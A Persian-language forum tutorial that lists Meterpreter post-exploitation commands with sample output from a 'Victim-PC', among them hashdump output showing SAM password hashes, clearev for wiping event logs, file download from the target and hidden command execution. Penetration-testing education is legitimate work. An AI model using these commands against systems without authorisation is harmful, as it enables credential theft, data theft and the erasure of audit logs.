SpareNet Servers Advertising & Link Exchange

اطلاعیه

بستن
هیچ اطلاعیه ای هنوز ایجاد نشده است .

بررسی چند دستور مهم در Meterpreter

بستن
X
 
  • فیلتر
  • زمان
  • نمایش
پاک کردن همه
نوشته‌های جدید

  • بررسی چند دستور مهم در Meterpreter

    درود...

    بررسی چند دستور مهم در Meterpreter:

    Meterpreter دارای دستورات مختلفی است که با استفاده از اجرای دستور زیر می توان لیستی از دستورات را به همراه شرح کوتاهی از آنان مشاهده کرد:
    کد:
    meterpreter > ?
    در این پست من به بررسی چند دستور مهم در meterpreter می پردازم:

    1) background: از این دستور برای تنظیم نشست (Session) فعلی روی بک گراند استفاده می شود که در زمان نیاز به این نشست، دسترسی به آن راحت باشد.

    2) getuid: این دستور، نام کاربری (username) ی را که در حال اجرا برروی سیستم عامل هدف می باشد را برمیگرداند. مثلاً:[align=left]
    کد:
    meterpreter > getuid
    Server username : Victim-PC\Victim
    [/align]3) getpid: این دستور، Preocess ID را وقتی که در حال اجرای meterpreter هستیم، بازگردانی میکند:[align=left]
    کد:
    meterpreter > getpid
    Current pid : 4124
    [/align]4) ps: با اجرای این دستور، تمامی پروسه های درحال اجرا برروی سیستم هدف لیست می شوند. این دستور می تواند در شناسایی سرویس ها و نرم افزارهای مختلف در جال اجرا برروی سیستم هدف مفید واقع گردد.
    5) sysinfo: این یک دستور برای تسریع در بررسی اطلاعات سیستم همانند سیستم عامل هدف و معماری آن می باشد.[align=left]
    کد:
    meterpreter > sysinfo
    Computer :              Victim-PC
    OS :                   Windows 7 Build 7264
    Architecture :             x86
    System Language :   en_US
    Meterpreter :         x86/win32
    [/align]6) shell: این دستور شما را به cmd سیستم هدف هدایت میکند. به بیانی دیگر با استفاده از این دستور به شل سیسم هدف دسترسی پیدا می کنید.

    7) exit: از این دستور نیز برای خروج از نشست ها و بازگشت به meterpreter استفاده می شود.



    ...... امیدوارم مفید واقع گردد....
    [align=center]

    [/align]

  • #2
    RE: بررسی چند دستور مهم در Meterpreter

    8- cat: دستور Cat همانند دستور موجود در سیستم های *nix عمل می کند.این دستور محتوای یک فایل را هنگام که آن فایل را به عنوان آرگومان دریافت می کند، نشان می دهد.[align=left] [/align]9- cd & pwd: از این دستورات ( cd & pwd ) برای تغییر و نمایش دایرکتوری مورد استفاده در حال حاضر در تارگت استفاده می شود.

    10- clearev: این دستور، لیست گزارشهای سیستم، گزارش های امنیتی و گزارشهای اپلیکیشن ها را پاکسازی می کند. ( این دستور بدون آرگومان می باشد.)

    قبل از بکار بردن دستور:



    بعد از اجرای دستور:



    11- download: از این دستور برای دانلود یک فایل از سیستم هدف استفاده میشود. توجه کنید که قبل از درج آدرس فایل، حتماً دو اسلش را تایپ کنید:[align=left]
    کد:
    download C:\\boot.ini
    [/align]12- hashdump: این دستور، از دیتابیس SAM در سیستم هدف نسخه برداری می کند:[align=left]
    کد:
    meterpreter > run post/windows/gather/hashdump
    [*] Obtaining the boot key...[*] Calculating the hboot key using SYSKEY 8528c78df7ff55040196a9b670f114b6...[*] Obtaining the user list and keys...[*] Decrypting user keys...[*] Dumping password hashes...
    
    Administrator:500:b512c1f3a8c0e7241aa818381e4e751b:1891f4775f676d4d10c09c1225a5c0a3:::
    dook:1004:81cbcef8a9af93bbaad3b435b51404ee:231cbdae13ed5abd30ac94ddeb3cf52d:::
    Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
    HelpAssistant:1000:9cac9c4683494017a0f5cad22110dbdc:31dcf7f8f9a6b5f69b9fd01502e6261e:::
    SUPPORT_388945a0:1002:aad3b435b51404eeaad3b435b51404ee:36547c5a8a3de7d422a026e51097ccc9:::
    victim:1003:81cbcea8a9af93bbaad3b435b51404ee:561cbdae13ed5abd30aa94ddeb3cf52d:::
    meterpreter >
    [/align]13- execute: اجرا کنندهء دستور رو سیستم هدف:[align=left]
    کد:
    meterpreter > execute -f cmd.exe -i -H
    Process 38320 created.
    Channel 1 created.
    Microsoft Windows XP [Version 5.1.2600]
    (C) Copyright 1985-2001 Microsoft Corp.
    
    C:\WINDOWS\system32>
    [/align] 
    [align=center]

    [/align]

    نظر

    صبر کنید ..
    X